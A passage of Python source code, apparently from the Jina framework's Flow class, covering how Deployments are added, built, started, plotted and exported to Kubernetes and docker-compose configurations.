file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only a flat structure is supported, which means if you upload `[./foo/a.py, ./foo/b.py, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When using it under Python, one can additionally use the following values:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_after: The executor attached after the Pods described by --uses, typically used for receiving from all shards, accepted type follows `--uses`. This argument only applies for sharded Deployments (shards > 1).
:param uses_after_address: The address of the uses-after runtime
:param uses_before: The executor attached before the Pods described by --uses, typically before sending to all shards, accepted type follows `--uses`. This argument only applies for sharded Deployments (shards > 1).
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split is provided, then the basename of that directory will be mounted into the container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param when: The condition that the documents need to fulfill before reaching the Executor. The condition can be defined in the form of a `DocArray query condition <https://docarray.jina.ai/fundamentals/documentarray/find/#query-by-conditions>`
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_deployment
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
deployment_role: 'DeploymentRoleType' = DeploymentRoleType.DEPLOYMENT,
**kwargs,
) -> 'Flow':
"""
Add a Deployment to the current Flow object and return the new modified Flow object.
The attribute of the Deployment can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Deployment(s) that this Deployment receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param deployment_role: the role of the Deployment, used for visualization and route planning
        :param copy_flow: when set to True, always copy the current Flow, apply the modification on the copy and return it; otherwise, modify the Flow in place
:param kwargs: other keyword-value arguments that the Deployment CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# deployment naming logic
deployment_name = kwargs.get('name', None)
if deployment_name in op_flow._deployment_nodes:
new_name = f'{deployment_name}{len(op_flow._deployment_nodes)}'
self.logger.debug(
f'"{deployment_name}" is used in this Flow already! renamed it to "{new_name}"'
)
deployment_name = new_name
if not deployment_name:
deployment_name = f'executor{len(op_flow._deployment_nodes)}'
if not deployment_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {deployment_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, deployment_name, needs, connect_to_last_deployment=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
# do not inherit the port argument from the flow
if key not in kwargs and key != 'port':
kwargs[key] = value
# update kwargs of this Deployment
kwargs.update(
dict(
name=deployment_name,
deployment_role=deployment_role,
)
)
parser = set_deployment_parser()
if deployment_role == DeploymentRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# deployment workspace if not set then derive from flow workspace
if args.workspace:
args.workspace = os.path.abspath(args.workspace)
else:
args.workspace = self.workspace
args.noblock_on_start = True
port = kwargs.get('port', None)
if not port:
port = helper.random_port()
args.port = port
if len(needs) > 1 and args.external and args.disable_reduce:
raise ValueError(
'External Executors with multiple needs have to do auto reduce.'
)
op_flow._deployment_nodes[deployment_name] = Deployment(args, needs)
op_flow.last_deployment = deployment_name
return op_flow
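    # A minimal usage sketch of `add()` (illustrative only, not part of the class):
    # it assumes a local Executor YAML `encoder.yml` and a hypothetical Hub Executor
    # `jinahub://MyIndexer`; any of the `uses` forms documented above would work.
    #
    #   f = (
    #       Flow()
    #       .add(name='encoder', uses='encoder.yml')
    #       .add(name='indexer', uses='jinahub://MyIndexer', needs='encoder')
    #   )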
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Deployment in the Flow
Internally, it adds two Deployments to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BaseDeployment(_pass) -- Flow
|
-- PUB-SUB -- InspectDeployment (Hanging)
In this way, :class:`InspectDeployment` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Deployment
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_deployment = self.last_deployment
op_flow = self.add(
name=name,
needs=_last_deployment,
deployment_role=DeploymentRoleType.INSPECT,
*args,
**kwargs,
)
# now remove uses and add an auxiliary Deployment
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_deployment,
deployment_role=DeploymentRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_deployment by the auxiliary Deployment
op_flow._inspect_deployments[_last_deployment] = op_flow.last_deployment
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_deployment: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Deployments output into one Deployment. When the Flow has no inspect Deployment then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Deployment
        :param include_last_deployment: whether to include the last modified Deployment in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [
k
for k, v in self._deployment_nodes.items()
if v.role == DeploymentRoleType.INSPECT
]
if needs:
if include_last_deployment:
needs.append(self.last_deployment)
return self.add(
name=name,
needs=needs,
deployment_role=DeploymentRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
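    # A rough sketch of how `inspect()` relates to `gather_inspect()` (executor names
    # are made up): the inspect Deployment hangs off `encoder` without changing the
    # main data path, and `gather_inspect()` joins all inspect outputs; it is normally
    # auto-invoked before `build()` unless `--no-inspect` is given.
    #
    #   f = Flow().add(name='encoder').inspect(name='eval').add(name='indexer')
    #   f = f.gather_inspect()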
def _get_gateway_target(self, prefix):
gateway_deployment = self._deployment_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_deployment.head_host,
'port': gateway_deployment.head_port,
'expected_parts': 0,
},
)
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
        :param copy_flow: when set to True, always copy the current Flow, apply the modification on the copy and return it; otherwise, modify the Flow in place
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._deployment_nodes:
op_flow._add_gateway(
needs={op_flow.last_deployment},
graph_description=op_flow._get_graph_representation(),
deployments_addresses=op_flow._get_deployments_addresses(),
graph_conditions=op_flow._get_graph_conditions(),
deployments_disabled_reduce=op_flow._get_disabled_reduce_deployments(),
)
removed_deployments = []
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
filtered_deployment_nodes = OrderedDict()
for k, v in op_flow._deployment_nodes.items():
if not v.role.is_inspect:
filtered_deployment_nodes[k] = v
else:
removed_deployments.append(v.name)
op_flow._deployment_nodes = filtered_deployment_nodes
reverse_inspect_map = {
v: k for k, v in op_flow._inspect_deployments.items()
}
while (
len(op_flow._last_changed_deployment) > 0
and len(removed_deployments) > 0
and op_flow.last_deployment in removed_deployments
):
op_flow._last_changed_deployment.pop()
for end, deployment in op_flow._deployment_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Deployment
# but not those inspect related node
if op_flow.args.inspect.is_keep:
deployment.needs = set(
ep
if deployment.role.is_inspect
else op_flow._inspect_deployments.get(ep, ep)
for ep in deployment.needs
)
else:
deployment.needs = set(
reverse_inspect_map.get(ep, ep) for ep in deployment.needs
)
hanging_deployments = _hanging_deployments(op_flow)
if hanging_deployments:
op_flow.logger.warning(
                f'{hanging_deployments} are hanging in this flow with no deployment receiving from them, '
                f'you may want to double-check whether this is intentional or a mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
if len(removed_deployments) > 0:
# very dirty
op_flow._deployment_nodes[GATEWAY_NAME].args.graph_description = json.dumps(
op_flow._get_graph_representation()
)
op_flow._deployment_nodes[
GATEWAY_NAME
].args.deployments_addresses = json.dumps(
op_flow._get_deployments_addresses()
)
op_flow._deployment_nodes[GATEWAY_NAME].update_pod_args()
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
        # do not know why but removing these 2 lines makes 2 tests fail
if GATEWAY_NAME in self._deployment_nodes:
self._deployment_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Deployments in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.orchestrate.pods.Pod`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
port_gateway = self._deployment_nodes[GATEWAY_NAME].args.port
if not (
is_port_free(__default_host__, port_gateway)
): # we check if the port is not used at parsing time as well for robustness
raise PortAlreadyUsed(f'port:{port_gateway}')
# set env only before the Deployment get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not v.external:
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_deployment_name, _deployment):
try:
if not _deployment.external:
results[_deployment_name] = 'pending'
_deployment.wait_start_success()
results[_deployment_name] = 'done'
except Exception as ex:
results[_deployment_name] = repr(ex)
def _polling_status(status):
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
pending_str = colored_rich(' '.join(pendings)[:50], 'yellow')
status.update(
f'{num_done}/{num_all} waiting {pending_str} to be ready...'
)
if not pendings:
break
time.sleep(0.1)
# kick off all deployments wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
console = get_rich_console()
with console.status('Working...') as status:
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, args=[status], daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = self._init_table()
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_deployments = [k for k, v in results.items() if v != 'done']
if error_deployments:
self.logger.error(
                f'Flow is aborted because {error_deployments} could not be started.'
)
self.close()
raise RuntimeFailToStart
if addr_table:
print(
Panel(
addr_table,
title=':tada: [b]Flow is ready to serve![/]',
expand=False,
)
) # can't use logger here see : https://github.com/Textualize/rich/discussions/2024
self.logger.debug(
f'{self.num_deployments} Deployments (i.e. {self.num_pods} Pods) are running in this Flow'
)
@property
def num_deployments(self) -> int:
"""Get the number of Deployments in this Flow
.. # noqa: DAR201"""
return len(self._deployment_nodes)
@property
def num_pods(self) -> int:
"""Get the number of pods (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_pods for v in self._deployment_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._deployment_nodes == b._deployment_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
deployment_nodes = []
# plot subgraphs
for node, v in self._deployment_nodes.items():
deployment_nodes.append(v.name)
deployment_mermaid = v._mermaid_str
mermaid_graph.extend(deployment_mermaid)
for node, v in self._deployment_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._deployment_nodes[need].role
_e_role = self._deployment_nodes[node].role
if self._deployment_nodes[need].external:
_s_role = 'EXTERNAL'
if self._deployment_nodes[node].external:
_e_role = 'EXTERNAL'
line_st = '-->'
if (
_s_role == DeploymentRoleType.INSPECT
or _e_role == DeploymentRoleType.INSPECT
):
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.INSPECT)} stroke:#F29C9F'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.JOIN_INSPECT)} stroke:#F29C9F'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(DeploymentRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='deployment_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
        :param build: build the Flow before plotting so that the gateway connection can be shown properly
        :param copy_flow: when set to True, always copy the current Flow, apply the
            modification on the copy and return it; otherwise, modify the Flow in place
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
# no need to deep copy if the Graph is built because no change will be made to the Flow
op_flow = (
copy.deepcopy(self)
if (copy_flow and self._build_level.value == FlowBuildLevel.EMPTY)
else self
)
if build and op_flow._build_level.value == FlowBuildLevel.EMPTY:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import Image, display
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
print(f'[link={url}]Click here to see the visualization in browser[/]')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
        Render the current Flow as a URL pointing to an SVG. It needs an internet connection.
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
        :return: the URL pointing to the SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self._deployment_nodes[GATEWAY_NAME].port
else:
return self._common_kwargs.get('port', None)
@port.setter
def port(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port'] = value
        # Flow is built to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port = self._common_kwargs['port']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self._deployment_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
        :param value: the new host to expose
"""
self._common_kwargs['host'] = value
        # Flow is built to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def monitoring(self) -> bool:
"""Return if the monitoring is enabled
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self[GATEWAY_NAME].args.monitoring
else:
return False
@property
def port_monitoring(self) -> int:
"""Return if the monitoring is enabled
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self[GATEWAY_NAME].args.port_monitoring
else:
return self._common_kwargs.get(
'port_monitoring', __default_port_monitoring__
)
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._deployment_nodes.items().__iter__()
def _init_table(self):
table = Table(title=None, box=None, highlight=True, show_header=False)
table.add_column('', justify='right')
table.add_column('', justify='right')
table.add_column('', justify='right')
table.add_column('', justify='right')
return table
def _get_address_table(self, address_table):
address_table.add_row(':link:', 'Protocol', f'{self.protocol}')
address_table.add_row(
':house:',
'Local access',
f'[link={self.protocol}://{self.host}:{self.port}]{self.host}:{self.port}[/]',
)
address_table.add_row(
':lock:',
'Private network',
f'[link={self.protocol}://{self.address_private}:{self.port}]{self.address_private}:{self.port}[/]',
)
if self.address_public:
address_table.add_row(
':earth_africa:',
'Public address',
f'[link={self.protocol}://{self.address_public}:{self.port}]{self.address_public}:{self.port}[/]',
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.add_row(
':speech_balloon:',
'Swagger UI',
f'[link=http://localhost:{self.port}/docs]http://localhost:{self.port}/docs[/]',
)
address_table.add_row(
':books:',
'Redoc',
f'[link=http://localhost:{self.port}/redoc]http://localhost:{self.port}/redoc[/]',
)
if self.gateway_args.expose_graphql_endpoint:
address_table.add_row(
':strawberry:',
'GraphQL UI',
f'[link=http://localhost:{self.port}/graphql]http://localhost:{self.port}/graphql[/]',
)
if self.monitoring:
address_table.add_row(
':bar_chart:',
'Prometheus',
f'[link=http://localhost:{self.port_monitoring}]http://localhost:{self.port_monitoring}[/]',
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
        :param stop_event: a threading event or a multiprocessing event that, once set, will return control
            to the main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
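    # A common serving pattern built on `block()` (sketch, assuming `f` is a Flow that
    # has already been defined): start the Flow via the context manager and keep the
    # main thread alive until Ctrl-C or until the stop event is set from elsewhere.
    #
    #   stop = multiprocessing.Event()
    #   with f:
    #       f.block(stop_event=stop)  # returns once `stop.set()` is called or on Ctrl-C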
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow, can only be set before the Flow has been started
:param value: the protocol to set
"""
        # Flow is running already, protocol can't be changed anymore
if self._build_level >= FlowBuildLevel.RUNNING:
raise RuntimeError('Protocol can not be changed after the Flow has started')
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
        # Flow is built to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
def __getitem__(self, item):
if isinstance(item, str):
return self._deployment_nodes[item]
elif isinstance(item, int):
return list(self._deployment_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
if self.args.workspace is not None:
return os.path.abspath(self.args.workspace)
else:
return None
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all deployments
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
p.update_pod_args()
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Deployments' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Deployments' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'pod_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "pod_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all deployments.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
v.update_pod_args()
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
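    # Illustrative sketch of `expose_endpoint()` (the endpoint name and metadata are
    # made up): map the Executor endpoint `/foo` to an HTTP route with richer OpenAPI
    # semantics before starting an HTTP Flow.
    #
    #   f = Flow(protocol='http').add(uses='encoder.yml')
    #   f.expose_endpoint('/foo', summary='encode documents', methods=['POST'])
    #   with f:
    #       f.block()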
# for backward support
join = needs
def to_k8s_yaml(
self,
output_base_path: str,
k8s_namespace: Optional[str] = None,
include_gateway: bool = True,
):
"""
Converts the Flow into a set of yaml deployments to deploy in Kubernetes.
        If you don't want to rebuild the image on Jina Hub,
        you can set the `JINA_HUB_NO_IMAGE_REBUILD` environment variable.
:param output_base_path: The base path where to dump all the yaml files
:param k8s_namespace: The name of the k8s namespace to set for the configurations. If None, the name of the Flow will be used.
:param include_gateway: Defines if the gateway deployment should be included, defaults to True
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
from jina.orchestrate.deployments.config.k8s import K8sDeploymentConfig
k8s_namespace = k8s_namespace or self.args.name or 'default'
for node, v in self._deployment_nodes.items():
if v.external or (node == 'gateway' and not include_gateway):
continue
if node == 'gateway' and v.args.default_port:
from jina.serve.networking import GrpcConnectionPool
v.args.port = GrpcConnectionPool.K8S_PORT
v.first_pod_args.port = GrpcConnectionPool.K8S_PORT
v.args.default_port = False
deployment_base = os.path.join(output_base_path, node)
k8s_deployment = K8sDeploymentConfig(
args=v.args,
k8s_namespace=k8s_namespace,
k8s_deployments_addresses=self._get_k8s_deployments_addresses(
k8s_namespace
)
if node == 'gateway'
else None,
)
configs = k8s_deployment.to_k8s_yaml()
for name, k8s_objects in configs:
filename = os.path.join(deployment_base, f'{name}.yml')
os.makedirs(deployment_base, exist_ok=True)
with open(filename, 'w+') as fp:
for i, k8s_object in enumerate(k8s_objects):
yaml.dump(k8s_object, fp)
if i < len(k8s_objects) - 1:
fp.write('---\n')
print(
f'K8s yaml files have been created under [b]{output_base_path}[/]. You can use it by running [b]kubectl apply -R -f {output_base_path}[/]'
)
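    # Usage sketch for `to_k8s_yaml()` (the image, output path and namespace are
    # examples, not defaults):
    #
    #   f = Flow().add(name='encoder', uses='docker://my-encoder:latest')
    #   f.to_k8s_yaml('./k8s_flow', k8s_namespace='demo')
    #   # then: kubectl apply -R -f ./k8s_flow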
def to_docker_compose_yaml(
self,
output_path: Optional[str] = None,
network_name: Optional[str] = None,
include_gateway: bool = True,
):
"""
Converts the Flow into a yaml file to run with `docker-compose up`
:param output_path: The output path for the yaml file
        :param network_name: The name of the network that will be used by the deployments
:param include_gateway: Defines if the gateway deployment should be included, defaults to True
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
output_path = output_path or 'docker-compose.yml'
network_name = network_name or 'jina-network'
from jina.orchestrate.deployments.config.docker_compose import (
DockerComposeConfig,
)
docker_compose_dict = {
'version': '3.3',
'networks': {network_name: {'driver': 'bridge'}},
}
services = {}
for node, v in self._deployment_nodes.items():
if v.external or (node == 'gateway' and not include_gateway):
continue
docker_compose_deployment = DockerComposeConfig(
args=v.args,
deployments_addresses=self._get_docker_compose_deployments_addresses(),
)
service_configs = docker_compose_deployment.to_docker_compose_config()
for service_name, service in service_configs:
service['networks'] = [network_name]
services[service_name] = service
docker_compose_dict['services'] = services
with open(output_path, 'w+') as fp:
yaml.dump(docker_compose_dict, fp, sort_keys=False)
command = (
'docker-compose up'
if output_path is None
else f'docker-compose -f {output_path} up'
)
print(
